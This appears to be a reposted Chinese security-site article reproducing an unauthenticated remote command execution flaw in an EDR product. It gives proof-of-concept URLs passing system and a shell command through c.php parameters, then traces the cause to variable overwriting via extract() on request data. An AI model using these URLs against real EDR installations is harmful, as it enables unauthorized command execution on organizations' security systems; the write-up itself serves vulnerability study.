1. 黑客安全网-互联网安全媒体信息综合平台首页
  2. 分类阅读
  3. WEB安全

深某服EDR漏洞复现

搭建一个edr环境

深某服EDR漏洞复现

https://XXX.com/tool/log/c.php?strip_slashes=system&host=id

深某服EDR漏洞复现

https://XXX.com/tool/log/c.php?strip_slashes=system&host=whoami

深某服EDR漏洞复现

将c.php文件拷贝到本地进行分析,能看到此文件最初是用来查看ldb的日志的。但复现时发现此界面不需要登陆就可以访问,因此也存在未授权访问的危险。

深某服EDR漏洞复现

首先查看输出

$_REQUEST会将接入的参数保存成数组,然后将前台获取的参数传入到了$show_form()

深某服EDR漏洞复现

跟进$show_form

深某服EDR漏洞复现

$show_form是匿名函数,use是调用外部变量$strip_slashes、$show_input。

extract() 函数会从数组中将变量导入到当前的符号表。它会把数组变成变量,该函数使用数组键名作为变量名,使用数组键值作为变量值。

因此,extract()存在变量覆盖问题,上述poc就是利用了此处的变量覆盖。

于是传入的参数就变成了$strip_slashes=system、$host=id

在91行中使用了$strip_slashes($host),结合poc,于是该处就变成了sysytem(id)执行了系统命令,产生了该漏洞

相关推荐: 对邮箱系统测试的一些思考

前言: 某次项目之后,突发奇想写一个全协议的邮箱暴破工具,与kali中的邮箱账户枚举工具配合使用更佳。(metasploit辅助模块:smtp_enum,smtp-user-enum工具) 该工具基于python3,分为6个模块,pop3,pop3S,smtp…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/articles/web/3353.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注